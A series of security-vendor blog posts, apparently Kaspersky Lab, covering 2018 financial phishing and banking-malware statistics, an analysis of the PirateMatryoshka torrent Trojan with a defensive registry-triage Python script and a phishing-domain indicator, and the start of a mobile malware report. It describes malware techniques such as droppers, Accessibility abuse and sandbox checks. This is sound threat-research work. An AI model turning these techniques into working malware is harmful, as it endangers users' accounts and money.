The past year has seen a wide range of changes in the financial cyberthreats landscape, with new infiltration techniques, attack vectors and extended geography. But perhaps the most interesting thing to have happened is the changes in how people are victimized. With blockchain and cryptocurrency now becoming popular, many new means of payment emerged on both the white and black markets – attracting unwanted criminal attention.

Cryptocurrency became the hottest topic in 2018. Definitely being the story of the year, it stole the headlines from the threat of ransomware, turning the eyes of the cybersecurity community to a new danger. Wherever users were eager to pay for something with cryptocurrency – criminals were there. Threats were delivered in two ways – enriching malware with mining capacities to capitalize without noise, and attacking cryptocurrency infrastructure (wallets, exchanges, etc.). Even major APT actors like Roaming Mantis tried to capitalize, not to mention malicious software like PowerGhost; basically a cryptocurrency mining multi-tool. As was also pointed out, Lazarus, one of the most active financial predators in 2018, gradually expanded its list of targets. The latter now includes banks, fin-tech companies, PoS terminals, ATMs, as well as crypto-exchanges.

In the summer, we also covered an interesting case that proves the above – Lazarus was found to be hitting a cryptocurrency exchange with a fake installer and macOS malware. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain; one of the key scenarios of the past year. This became one of the most creative attacks seen in 2018.

However, several months after that, the cybersecurity landscape brought an even bigger surprise to the community, yet again pointing out that even traditional, and experienced, financial enterprises could be endangered. In December, Kaspersky Lab revealed the DarkVishnya operation: a new series of unprecedented cyber-robberies targeting financial organizations in Eastern Europe. Incident responses, provided by our experts, discovered that in each case the corporate network was breached through an unknown device, controlled by the attackers, which had been smuggled into a company building and connected to the network. At least eight banks in the region have been attacked in this way, with estimated losses running into tens of millions of dollars. The conclusion here is simple – even when investing in cybersecurity, you may never know how a cybercriminal will attack you. We all should be twice as vigilant.

This is a worrisome sign. While banks are experienced and have learnt how to improve their defenses, young fin-tech companies and crypto-exchanges could face a higher risk, due to the infancy of their security systems. Also, new unprecedented attack methods should be a warning for traditional financial organizations to be on guard.

Another cause for concern is that criminals decided to focus their efforts not only on financial services, but also on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. In the summer of 2018, Kaspersky Lab experts revealed a new wave of financial spear-phishing emails disguised as legitimate procurement and accounting letters that hit at least 400 industrial organizations in an attempt to earn money for cybercriminals.

We should also not forget about ATMs and should treat their security seriously: within the last year, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs. Apart from that, 2018 gave birth to a new toolkit for stealing money directly from such machines – we dubbed it KoffeyMaker.

Wrapping up on big businesses, the industry also witnessed good news – in 2018, police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world.

Going one level lower – from big organizations to small and medium enterprises – there were also a lot of attacks on organizations that use banking systems. Kaspersky Lab’s machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan when attackers embedded their code in popular news sites and forums.

Moving down one more step – from SMEs to individual users – we can say that 2018 didn’t give the latter much respite from financial threats. Infamous mobile bankers are still there, hunting for money. Considering the above-mentioned changes in the landscape, it is no surprise that they are expanding their capacities, often combining various functions – like Rotexy, which over the years has evolved into a banker and ransomware simultaneously. Some of them add mining capacities to ensure they make a profit. Other actors invested in new ways to compromise users – for instance, in 2018 Kaspersky Lab experts detected quite a rare Chrome extension designed to steal credentials.

The presented report continues the series of Kaspersky Lab reports (see here and here) that provide an overview of how the financial threat landscape has evolved over the years. It covers the common phishing threats that users encounter, along with Windows-based and Android-based financial malware.

The key findings of the report are:

Phishing:

  • In 2018, the share of financial phishing decreased from 53.8% to 44.7% of all phishing detections, still accounting for almost a half of overall detections.
  • Around one in five attempts to load a phishing page blocked by Kaspersky Lab products is related to banking phishing.
  • The share of phishing-related attacks on payment systems and online shops accounted for almost 14% and 8.9% respectively in 2018. This is slightly less (single percentage points) than in 2017.
  • The share of financial phishing encountered by Mac users slightly grew, accounting for 57.6%.

Banking malware:

  • In 2018, the number of users attacked with banking Trojans was 889,452 – an increase of 15.9% in comparison with 767,072 in 2017.
  • 24.1% of users attacked with banking malware were corporate users.
  • Users in Russia, Germany, India, Vietnam, Italy, US and China were the most often attacked by banking malware.
  • Zbot and Gozi are still the kings when it comes to the most widespread banking malware families (over 26% and 20% of attacked users), followed by SpyEye (15.6%).

Android banking malware:

  • In 2018, the number of users that encountered Android banking malware more than tripled to 1,799,891 worldwide.
  • Just three banking malware families accounted for attacks on the vast majority of users (around 85%).
  • Russia, South Africa, and the United States were the countries with the highest percentage of users attacked by Android banking malware.

Financial Phishing

Financial phishing, one of the most typical ways for criminals to make money, doesn’t require a lot of investment to be potentially profitable. If successful, criminals receive credentials that can either be used to take the money or can be sold for a good price.

This combination of technical simplicity and effectiveness makes this type of malicious activity attractive to criminals. As Kaspersky Lab’s telemetry systems show, this type of activity has accounted for around half of all phishing attacks over the past few years.

Fig. 1: The percentage of financial phishing attacks (from overall phishing attacks) detected by Kaspersky Lab in 2015-2018

In 2018, Kaspersky Lab’s anti-phishing technologies detected 482,465,211 attempts to visit different kinds of phishing pages. Of those, 44.7% of heuristic detections were attempts to visit a financial phishing page – almost 10% less than the share of phishing detections registered in 2017 (when it was 53.8%, the highest percentage of financial phishing ever registered by Kaspersky Lab).

This was mainly due to the increase in other phishing attack categories. But first, let’s have a closer look at the financial categories.

Kaspersky Lab categorization considers several types of phishing pages as “financial” – banks, well-known payment brands such as PayPal, Visa, MasterCard, American Express and others, and internet shops and auction sites like Amazon, Apple store, Steam, eBay and others. In 2018 all of them experienced slight relief: the share of phishing attacks against banks, payment systems and online shops decreased by 5.3, 1.8, and around 2 percentage points respectively.

Financial phishing attacks took 2nd, 3rd and 4th positions in the overall ranking:

Fig. 2: The distribution of different types of financial phishing detected by Kaspersky Lab in 2018

While in 2017 for the first time in our observations, payment systems and online shops hit the top three in all categories of phishing detections, 2018 became the year of going back to normal with global online portals being in first position. However, the presented chart shows that almost every second phishing attack was financially-related.

We believe that this change happened due to high media attention to targets like Facebook amid various scandals across the year. If we look at the global internet portal category, it fell from second place in 2016 with 24.1% to fourth place in 2017 with 10.9%. In 2018 it restored its position, accounting for over 24%.

Fig. 3: The percentage of global internet portal phishing detected by Kaspersky Lab in 2016-2018

At the same time, the victimology has not experienced any change – top transnational banks, popular payment systems and internet shops and auction sites are still the most appealing targets for cybercriminals.

Financial phishing on Mac

MacOS has long been considered a relatively safe platform when it comes to cybersecurity due to the small number of malware families that target it. However, phishing is an OS-agnostic criminal activity – it is all about social engineering. Moreover, according to Kaspersky Lab’s statistics, MacOS users often face phishing threats – if not with the same frequency as other users.

In 2016, 31.4% of phishing attacks against Mac-users were aimed at stealing financial data. This is almost half that seen in 2017, when 55.6% of financial attacks blocked by Kaspersky Lab were financially-themed. The past year also indicated slight growth, with the overall share at the level of 57.6%, meaning that the threat is not fading.

Overall, in 2017 the split looked like this:

Fig. 4: The distribution of different types of financial phishing detected by Kaspersky Lab on Mac in 2017

One year later, the ‘Other’ category slightly fell, leading to the overall growth of financially related attacks.

Fig. 5: The distribution of different types of financial phishing detected by Kaspersky Lab on Mac in 2018

All in all, our data shows that the financial share of phishing attacks on Macs is also quite solid – as seen for Windows. Let’s have a closer look at both categories.

Mac vs Windows

In 2017, we discovered an interesting twist when Apple became the most frequently used brand in the online shop category in both MacOS and Windows statistics, pushing Amazon down to second place on the latter platform. Even more interesting is that in 2018 Apple kept its position in Windows statistics, but Amazon went back to leading MacOS statistics for the first time since we started tracking this activity.

Mac | Windows
Amazon.com: Online Shopping | Apple
Apple | eBay
Alibaba Group | Amazon.com: Online Shopping
eBay | MercadoLibre
Americanas | Steam
groupon | Alibaba Group
Bell Canada | Americanas
Shopify | Netflix Inc
Hostway | Wal-Mart Stores, Inc.

Fig. 6: The most frequently used brands in ‘online shop’ financial phishing schemes

When it comes to attacks on users of payment systems, the situation is as follows:

Mac | Windows
PayPal | Visa Inc.
Visa Inc. | PayPal
MasterCard International | American Express
American Express | MasterCard International
Skrill Ltd. | Cielo S.A.
adyen payment system | qiwi.ru
Authorize.Net | alipay
qiwi.ru | Skrill Ltd.
Perfect Money | Ripple

Fig. 7: The most frequently used brands in ‘payment systems’ financial phishing schemes

Overall, the situation is more or less the same apart from the fact that PayPal overtook MasterCard and took first place in MacOS statistics.

The tables above can serve as advisory lists for the users of the corresponding systems: they illustrate that criminals will use these well-known names in an attempt to illegally obtain user payment cards, online banking and payment system credentials.

Phishing campaign themes

Apart from the traditional campaigns that will be covered below, there was one distinctive feature in phishing disguises in comparison with 2016 and 2017 – entertainment. While it is not fully financially related, criminals still could steal users’ credentials or account for sale or personal use. The list of topics is no longer limited to fairly old copies of online banking, payment systems or internet shop web pages.

Here is a closer look at the most targeted sectors, starting with movie streaming services.

Fig. 8: A phishing page under the guise of streaming service

Digital gaming platforms.

Fig. 9: A phishing page under the guise of gaming platform

Typical commercial and payment brands were also targeted – usually urging a victim to enter credentials as soon as possible.

Fig. 10: A phishing message on behalf of payment brand

Fig. 11: A phishing message on behalf of payment brand

Of course, by clicking the link or entering the credentials, a user would not get access to their account – they would just pass their important personal information on to fraudsters.

This is one of the most common tricks to intimidate a victim – the threat of blocking or breaking into an account (“your account has been suspended”).

Don’t show your credit card data to strangers

Due to human nature and social engineering, phishing has been in the cybercriminals’ arsenal for years, being a major tool not only for monetization, but also for major APT actors as a method to initially compromise a targeted system.

That said, always stay vigilant. Double check the legitimacy of the website while paying online. Double check the legitimacy of emails, especially if they urge you to do something – like change your password.

If you can’t be sure of the above – don’t click the link.

And don’t forget to use a proven security solution with behavior-based anti-phishing technologies. This will make it possible to identify even the most recent phishing scams that haven’t yet been added to anti-phishing databases.

Banking malware

When discussing financial malware in this paper – for clarity – we mean the typical banking Trojans, designed to steal the credentials used to access online banking or payment system accounts and to intercept one-time passwords.

Across 2016, there was steady growth in the number of users attacked with any kind of financial malware – after falls in 2014 and 2015. 2017 and the first half of 2018 saw falls once again. In 2017, the decrease returned with the number of attacked users falling to 767,072 from 1,088,933 users worldwide in 2016 – almost a 30% decline.

However, a sharp increase from May to November 2018 changed the landscape, offsetting the decline, with the overall number growing by 15.95% to 889,452 in comparison with the previous year. This is the first instance of year-to-year growth since 2016. This happened due to explosive growth in RTM banker activity, which is explored below.

Fig. 12: The dynamic change in the number of users attacked with banking malware 2016-2018

The geography of attacked users

As shown in the charts below, more than half of all users attacked with banking malware in 2017 and 2018 were located in only ten countries. In 2017, the leader was Germany, followed by Russia and China.

Fig. 13: The geographic distribution of users attacked with banking malware in 2017

Here is what happened in 2018:

Fig. 14: The geographic distribution of users attacked with banking malware in 2018

In the last year, Russia overtook Germany. India did the same to China, rounding out the top three, while China dropped to seventh position. Overall, the picture looks more or less stable, with the leader accounting for about one in five users, while the ‘Others’ category accounts for around 40% of the share.

The type of users attacked

2017 showed slight growth in this sector, confirming our hypothesis that criminals are shifting to targeted attacks on business – despite the overall fall in banking malware detections, the corporate users’ share is still showing a steady rise.

Fig. 15: The distribution of attacked users by type in 2017

This is alarming, as we see that for the last three years in a row, almost every fifth banking malware attack was focused on the corporate sector. And the share is growing. The reason behind this is clear – while attacks on consumers will only give a criminal access to banking or payment system accounts, successful hits on employees will also compromise a company’s financial resources.

2018 has once again proven this:

Fig. 16: The distribution of attacked users by type in 2018

The share of corporate users has grown by over 4 percentage points.

The main actors and developments

The banking malware landscape has been continuously occupied by several major players. In 2017, Zbot was the leader, actively challenged by Gozi.

Fig. 17: The distribution of the most widespread banking malware families in 2017

The latter increased its share by more than 10 percentage points, while Zbot decreased its own from more than 44% to 32.9%.

One more particularly interesting thing about 2017 was that the share of the ‘others’ category more than doubled, indicating that the financial threat landscape is becoming more and more diverse. That said, while the proportion of leaders was reducing, smaller players were becoming more active.

Fig. 18: The distribution of the most widespread banking malware families in 2018

2018 saw a trend of the major players decreasing their attacks – Zbot fell to 26.4% and Gozi to a little bit over 20%. At the same time, the ‘other’ category also shrank. The landscape is obviously stabilizing with “middle-class” families strengthening their positions.

This is very inconvenient for the security research community as it is much easier to track several big players than many attackers that are small and flexible in their tactics.

Of particular interest was the RTM banking Trojan, whose explosive growth pumped up the figures for 2018. Kaspersky Lab warned about this family when there was a surge in its activity, with the overall number of users attacked in 2018 exceeding 130,000 – an increase from as few as 2,376 attacked users in 2017.

The pace of attacks appears to be continuing into 2019, with more than 30,000 users attacked during the first month and a half of the year, making RTM one of the most active banking Trojans on the threat landscape.

Interestingly, the Trojan targets not financial organizations per se but rather people responsible for financial accounting in small and medium-sized businesses, with a particular focus on the IT and legal sectors. This makes RTM attacks part of a general trend where cybercriminals are shifting their attention away from financial organizations towards the private sector, where entities in general invest less in security solutions. So far, the Trojan has hit mostly companies based in Russia. But there have been multiple cases in the industry when successful cyber threats were first used in Russia and later went international. The RTM banking Trojan can easily become yet another example of the same development cycle.

Kaspersky Lab estimates that during the course of two years, the attackers may have conducted multiple illegal transactions, up to a million rubles (the equivalent of $15,104) each.

That is why we urge organizations that can become potential targets of this malware to take preventative measures and make sure their security products detect and block this threat.

We also recommend that users be cautious when conducting financial operations online from PCs in general. Don’t underestimate the professionalism of modern cybercriminals by leaving your computer unprotected.

Mobile Banking Malware

We have reviewed the methodology behind the mobile section of this year’s report. Traditionally, we have analyzed Android banking malware statistics through KSN data gathered from the Kaspersky Internet Security solution. But since Kaspersky Lab develops new mobile security solutions and features, statistics gathered from one product alone become less relevant. That is why this year we decided to shift to expanded data, gathered from multiple mobile solutions.

And here is the result:

Fig. 19: The change in the number of users attacked with Android banking malware 2016-2018

Over the last few years, Android banking malware evolved – with several peaks in 2016. The overall number of attacked users was 786,325.

2017 was more stable and the number of users who encountered mobile malware reached 515,816. But then there was a game changer.

In April 2018 the number of attacked users started to rise rapidly, with the overall figure reaching 1,799,891 – which means that it has more than tripled in just a year. As can be seen, this was mainly due to two peaks in the periods from April to June and July to September.

Kaspersky Lab experts took a closer look at the reasons why this may have happened.

To do this, they reviewed the most widespread families across the year.

Back in 2017, the distribution of the major families was calm and smooth with the statistic looking more or less balanced.

Fig. 20: The most widespread Android banking malware in 2017

If we take the overall number of detections, the absolute leaders in 2017 were Asacub, Faketoken and Hqwar. Let’s look at them a bit more closely.

Asacub, a constantly evolving piece of malware, is spread via SMS and its distribution is uneven with several peaks across the year:

Fig. 21: The change in the number of users attacked by the Asacub Android banking Trojan

At the same time, Faketoken evened out its activities, gradually lowering its hits from 13,563 in January, to 3,872 in December.

Fig. 22: The change in the number of users attacked by Faketoken Android banking malware

The third major player in the field, Hqwar, demonstrated an almost identical picture.

Fig. 23: The change in the number of users attacked by Hqwar Android banking malware

2018 was different.

Fig. 24: The most widespread Android banking malware in 2018

Asacub more than doubled its share, reaching almost 60%, followed by Agent (14.28%) and Svpeng (13.31%). All three of them experienced explosive growth in 2018, especially Asacub, as it jumped from 146,532 attacked users in 2017 to 1,125,258.

As the statistics show, this is a general trend as almost all more or less active families ramped up their activities in 12 months. But let’s have a closer look at the top three families in 2018.

Fig. 25: The change in the number of users attacked by the Asacub Android banking Trojan

As the graph above shows, Asacub was quite stable across the year apart from two peaks that made it a leader – periods between May and July and July and October.

Fig. 26: The change in the number of users attacked by the Agent Android banking Trojan

Agent experienced more consistent spikes – overall it was very active from February to April and April to July, with a more stable distribution of attacks – around 20,000 to 30,000 attacked users per month.

Fig. 27: The change in the number of users attacked by the Svpeng Android banking Trojan

Svpeng demonstrates another picture entirely. This malware family was not very active for almost half a year, then kicked off in May and grew until June, with almost 100,000 attacked users. There was then a gradual fall for the rest of the year.

Geography of attacked users

In previous reports, we calculated the distribution of users attacked with Android Banking Trojans by comparing the overall number of unique users attacked by this type of malware with the overall number of users in a region. There was always one problem – the majority of detections of this malicious software traditionally came from Russia, due to the prevalence of SMS banking in the region, which allows attackers to steal money with a simple text message if an infection is successful. Previously, the same was true for SMS Trojans, but after regulatory measures, criminals have found a new way to capitalize on victims in Russia.

This year we decided to change the methodology, replacing the overall number of attacked unique users with the overall number of users registered in the respective region.

In 2017 the landscape was the following:

Australia | 1.05%
Turkmenistan | 0.82%
Russia | 0.8%
Turkey | 0.46%
Kazakhstan | 0.39%
Uzbekistan | 0.37%
Tajikistan | 0.3%
Poland | 0.25%
Latvia | 0.22%
Germany | 0.22%

Fig. 28: The top 10 countries with the highest percentage of users that encountered Android banking malware in 2017

In 2018, the picture changed:

Russia | 2.32%
South Africa | 1.27%
US | 0.82%
Australia | 0.71%
Armenia | 0.51%
Poland | 0.46%
Moldova | 0.44%
Kyrgyzstan | 0.43%
Azerbaijan | 0.43%
Georgia | 0.42%

Fig. 29: The top 10 countries with the highest percentage of users that encountered Android banking malware in 2018

As we can see, mobile malware is indeed on the rise, with around two-digit growth in the average level of infections in the top 10 countries. In 2018, Russia jumped up to first place, followed by South Africa and the US. Australia dropped to fourth position while Turkmenistan left the chart for good.

Major changes to the Android banking malware landscape

While figures tell their own story, there are many more ways to explore changes and developments in the threat landscape. Our key method is the analysis of actual malware found in the wild.

As this analysis shows, 2018 could be the fiercest cybercriminal onslaught ever seen when it comes to malicious mobile software. Last year it seemed that the threat had balanced out both in terms of the number of unique samples discovered and the number of attacked users.

However, 2018 indicated that the situation had radically changed for the worse. The root cause of this rise is not clear, but the main culprits are the creators of the Asacub and Hqwar Trojans. The former has quite a long history – according to our data, the group behind it has been at work for more than three years. Asacub itself evolved from an SMS Trojan that was armed from the get-go with tools to counteract deletion and intercept incoming calls and SMS messages. Later, the creators of the malware beefed up its logic and began mass distribution using the same attack vector as before: social engineering via SMS. Online forums where people often expect messages from unfamiliar users became a source of mobile numbers. Next, the avalanche propagation method kicked in, with infected devices themselves becoming distributors – Asacub would be sent to everyone in a victim’s contact list.

However, banking Trojans in 2018 were noteworthy not just in terms of scale but mechanics as well. One aspect of this is the increasingly common use of Accessibility Services in banking threats. This is partly a response to new versions of Android that make it increasingly difficult to overlay phishing windows on top of banking apps. With Accessibility Services, the Trojan can also lodge itself in the device so that users cannot remove it by themselves. What’s more, cybercriminals can use Accessibility Services to hijack a perfectly legitimate application and force it, for example, to launch a banking app to make a money transfer right there on the victim’s device. Techniques have also appeared to counter dynamic analysis; for example, the Rotexy Trojan checks to see if it is running in a sandbox. However, this is not exactly a new thing, since we have observed such behavior before. That said, it should be noted that combined with obfuscation, anti-dynamic analysis techniques can be effective if virus writers manage to infiltrate their Trojan into a popular app store, in which case both static and dynamic processing may be powerless. Although sandbox detection cannot be said to be common practice among cybercriminals, the trend is evident, and we are inclined to believe that such techniques will become very sophisticated in the near future.

Conclusion and advice

2018 demonstrated that criminals keep updating their malware with new features, investing resources into new ways of distribution and into the development of detection avoidance techniques.

They also expand their list of victims, adding new institutions and industries to it.

This all means that they still get financial gain out of their activities.

As the above threat data shows, there is still plenty of room for financial fraud operations involving phishing and specific banking malware in this sphere. At the same time, mobile malware regained its power, jeopardizing users across the world.

In order to avoid the risk of losing money as a result of a cyberattack, Kaspersky Lab’s experts advise the following:

For home users

  • Don’t click on suspicious links. They are mostly designed to download malware onto your device or lead you to phishing webpages, which intend to steal your credentials.
  • Never open or store unfamiliar files on your device as they could be malicious.
  • Always stay vigilant when using public Wi-Fi networks as they can be insecure and unreliable, making hotspots a prime target for hackers to steal user information. To keep your confidential information safe, never use hotspots to make online payments or share financial information.
  • Websites can be a front for cybercriminals, with the sole purpose of harvesting your data. To stop your confidential details from falling into the wrong hands, if a site seems suspicious or is unfamiliar, do not enter your credit card details or make a purchase.
  • To avoid compromising your credentials through a mobile banking application, make sure you use the official app for your financial services, and ensure it is not compromised. Download apps only from official app stores, such as Google Play or the iOS App Store.
  • To avoid falling into a trap, always check that the website is genuine, by double-checking the format of the URL or the spelling of the company name, before entering any of your credentials. Fake websites may look just like the real thing, but there will be anomalies to help you spot the difference.
  • To give you more confidence when assessing the safety of a website, only use websites which begin with HTTPS:// and therefore run across an encrypted connection. HTTP:// sites do not offer the same security and could put your information at risk as a result.
  • Never disclose your passwords or PIN-codes to anyone – not even your closest family and friends or your bank manager. Sharing these will only increase the level of risk and exposure to your personal accounts. This could lead to your financial information being accessed by cybercriminals, and your money stolen.
  • To help prevent financial fraud, a dedicated security solution on your device, with built-in features, will create a secure environment for all of your financial transactions. Kaspersky Lab’s Safe Money technology is designed to offer this level of protection to users and provide peace of mind. Use reliable security solutions for comprehensive protection from a wide range of threats, such as Kaspersky Security Cloud and Kaspersky Internet Security.
  • To keep your credentials safe, it is important to apply the same level of vigilance and security across all of your devices – whether desktop, laptop or mobile. Cybercriminal exploits have no boundaries, so your security needs to be just as widespread to minimize the risk of your information falling into the wrong hands. Use a reliable security solution for storing valuable digital data, such as Kaspersky Password Manager.

For businesses

  • Pay specific attention to endpoints from which financial operations are being completed: update the software installed on these endpoints first, and keep their security solution up to date.
  • Invest in regular cybersecurity awareness training for employees to educate them not to click on links or open attachments received from untrusted sources. Conduct simulated phishing attacks to ensure that they know how to distinguish phishing emails.
  • If you use cloud email services, make sure you have installed a dedicated protection for your email – such as Kaspersky Security for Microsoft Office 365 – to strengthen your protection against business email compromise.
  • Ensure all levels of your corporate infrastructure are protected, from core data centers to specialized systems in the case of banking infrastructure (such as ATMs). For ATM and POS use solutions designed specifically for these systems, such as Kaspersky Embedded Systems Security, which protect even devices with weak or legacy hardware.
  • Provide your security operation center team with access to Threat Intelligence so it remains up to date with the latest tactics and tools used by cybercriminals.
  • Leverage advanced detection and response technologies, such as Kaspersky Endpoint Detection and Response, part of the Threat Management and Defense solution. It makes it possible to catch even unknown banking malware and gives security operation teams full visibility over the network and response automation.
  • To ensure protection for their clients, financial institutions should use solutions that can prevent fraud. For example, Kaspersky Fraud Prevention analyzes events that occur during the entire session and prevents fraud in real time.

March 6, 2019

Pirate matryoshka

The use of torrent trackers to spread malware is a well-known practice; cybercriminals disguise it as popular software, computer games, media files, and other sought-after content. We detected one such campaign early this year, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies of paid programs.

We noticed that the tracker contained malicious torrents created from dozens of different accounts, including ones registered on TPB for quite some time.

Torrent content

Instead of the expected software, the file downloaded to the user’s computer was a Trojan, whose basic logic was implemented by SetupFactory installers. Our security solutions detect the malware as Trojan-Downloader.Win32.PirateMatryoshka.

At the initial stage, the installer decrypts another SetupFactory installer for displaying a phishing web page.

The page opens directly in the installation window and requests the user’s TPB account credentials, supposedly to continue the process.

The compromised accounts were most likely used by the cybercriminals to spread more malicious torrents on the resource — we noted above that not only newly created accounts were used for this purpose.

Before performing the next step, PirateMatryoshka verifies that it is running in the attacked system for the first time. To do so, it checks the registry for the path HKEY_CURRENT_USER\Software\dSet. If it exists, further execution is terminated. If the key is not found, the installer queries the pastebin.com service for a link to the additional module and its decryption key.
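The registry path checked by the installer can also serve as a triage indicator. The following is an added example, not code from Kaspersky: it scans the text of a registry export (for instance one produced with reg export HKU) for the Software\dSet key under any user hive. It assumes the key is left behind once the installer has run, which is an inference from the first-run check described above; the SIDs in the sample are constructed.

```python
"""Offline triage of a registry export for the PirateMatryoshka first-run marker.

Added example. Input is the text of a .reg export taken from the host
under investigation.
"""
import re
from pathlib import Path

# Key path named in the article. Registry key names compare case-insensitively.
# The pattern matches the key itself or any subkey below it, under
# HKEY_CURRENT_USER or a per-user hive in HKEY_USERS, and nothing else:
# Software\dSetup and Software\Vendor\dSet must not match.
MARKER_KEY = re.compile(
    r"^\[(HKEY_CURRENT_USER|HKEY_USERS\\[^\\\]]+)\\Software\\dSet(?:\\.*)?\]\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def read_reg_export(path):
    """Read a .reg file. Version 5.00 exports are UTF-16 with a BOM;
    the older REGEDIT4 format uses a single-byte ANSI code page."""
    data = Path(path).read_bytes()
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("cp1252", errors="replace")


def hives_with_marker(reg_text):
    """Return the hive roots (HKCU or HKU\\<SID>) that contain Software\\dSet,
    in order of first appearance and without duplicates."""
    seen = []
    for match in MARKER_KEY.finditer(reg_text):
        root = match.group(1)
        if root.upper() not in (r.upper() for r in seen):
            seen.append(root)
    return seen


# Constructed sample export: only the hives ending in -1001 and -1004 carry the key.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-1000000000-2000000000-3000000000-1001\Software\dSet]

[HKEY_USERS\S-1-5-21-1000000000-2000000000-3000000000-1002\Software\dSetup]
"Version"="1.0"

[HKEY_USERS\S-1-5-21-1000000000-2000000000-3000000000-1003\Software\Vendor\dSet]

[HKEY_USERS\S-1-5-21-1000000000-2000000000-3000000000-1004\SOFTWARE\dset\Sub]
"""

if __name__ == "__main__":
    for hive in hives_with_marker(SAMPLE_EXPORT):
        print("marker key present in", hive)
```

A hit identifies the user profile to examine further; it does not by itself confirm which of the bundled programs were installed.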

The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence:

The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (classified by us as Adware). They usually make their way to users through file sharing sites — besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel. For example, in InstallCapital the full list of installable software is placed at the end of the license agreement:

And in MegaDowl, the list is hidden behind the seemingly inactive Advanced settings button:

The other two files are autoclickers written in VisualBasic, which are required to prevent the user from canceling the installation of the additional software (in which case the cybercriminals go empty-handed). The autoclickers are run before the installers; when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

As a result of PirateMatryoshka’s efforts, the victim computer is flooded with unwanted programs that pester the user and waste system resources. On a separate note, the owners of file partner programs often do not track the programs offered in their downloaders. Our research shows that one in five files offered by partner installers is malicious — among those we encountered pBot, Razy, and others.

Conclusion

Cybercriminals are always coming up with new kinds of fraud. In this particular case, they employed a method for delivering malicious content through torrent trackers to install adware on user computers. As a result, many TPB users not only picked up adware or malware on their machines, but had their accounts compromised.

Kaspersky Lab solutions detect PirateMatryoshka and its components with the following verdicts:

Trojan-Downloader.Win32.PirateMatryoshka
Trojan.Win32.InstClick
AdWare.Win32.StartSurf
AdWare.Win32.SmartInstaller
AdWare.Win32.Generic

IOCs

Phishing domain

www.mobilekey[.]pw

March 5, 2019

Mobile malware evolution 2018

The statistical data for this report came from all Kaspersky Lab mobile security solutions, not just Kaspersky Mobile Antivirus for Android. Consequently, the comparative data for 2017 may differ from the data for the same period published in the previous report. The analytical scope was expanded due to the growing popularity of various Kaspersky Lab products and their geographical reach, which made it possible to obtain statistically reliable data. On the whole, the more products we use in compiling the statistics, the more accurate the mobile threatscape that emerges.

Figures of the year

In 2018, Kaspersky Lab products and technologies detected:

  • 5,321,142 malicious installation packages
  • 151,359 new mobile banking Trojans
  • 60,176 new mobile ransomware Trojans

Trends of the year

Users of mobile devices in 2018 faced what could be the strongest cybercriminal onslaught ever seen. Over the course of the year, we observed both new mobile device infection techniques (for example, DNS hijacking) and a step-up in the use of tried-and-tested distribution schemes (for example, SMS spam). Virus writers were focused on:

  • Droppers (Trojan-Dropper), designed to bypass detection
  • Attacks on bank accounts via mobile devices
  • Apps that can be used by cybercriminals to cause damage (RiskTool)
  • Adware apps

In 2018, we uncovered three mobile APT campaigns aimed primarily at spying on victims, including reading messages in social networks. Alongside these campaigns, this report touches on all the major events in the world of mobile threats that occurred during the year.

Rise of the droppers

In the past three years, dropper Trojans have become the weapon of choice for cybercriminals specializing in mobile malware. The methods for assembling these Matryoshka-like programs were streamlined, allowing them to be easily created, used and sold by various groups. A dropper creator may have several clients involved in developing ransomware Trojans, banking Trojans, and apps showing persistent ads. Droppers are used as a means to hide the original malicious code, which simultaneously:

  • Counteracts detection. The dropper works particularly well against detection based on file hashes, since it generates a new hash each time, while the malware inside does not change a single byte.
  • Enables any number of unique files to be created. Virus writers need this, for instance, when using their platform with a fake app store.

Although mobile droppers are nothing new, in Q1 2018 we saw a sharp rise in the number of users attacked by packed malware. The biggest contribution was made by members of the Trojan-Dropper.AndroidOS.Piom family. Growth continued in Q2 and beyond, but much more smoothly. There is no doubt that established groups that have not yet embraced droppers will soon either create their own or buy ready-made ones. This trend will affect the statistical map of detected threats: we will see fewer unique mobile malware families, replaced by droppers of various kinds.

Banking Trojans ride the wave

Last year’s stats on the number of attacks involving mobile banking Trojans were eye-catching. At the beginning of 2018, it seemed that this type of threat had stabilized both by number of unique samples discovered and by number of users attacked. However, already by Q2 the situation had radically changed for the worse. New records were set in terms of both number of mobile banking Trojans detected and number of attacked users. The root cause of this hike is not clear, but the main culprits are the creators of the Asacub and Hqwar Trojans. The former has quite a long history — according to our data, the group behind it has been at work for more than three years. Asacub itself evolved from an SMS Trojan that was armed from the get-go with tools to counteract deletion and intercept incoming calls and SMS messages. Later, the creators of the malware beefed up its logic and began mass distribution using the same attack vector as before: social engineering via SMS. Online forums where people often expect messages from unfamiliar users became a source of mobile numbers. Next, the avalanche propagation method kicked in, with infected devices themselves becoming distributors — Asacub sent itself to everyone in the victim’s phone book.

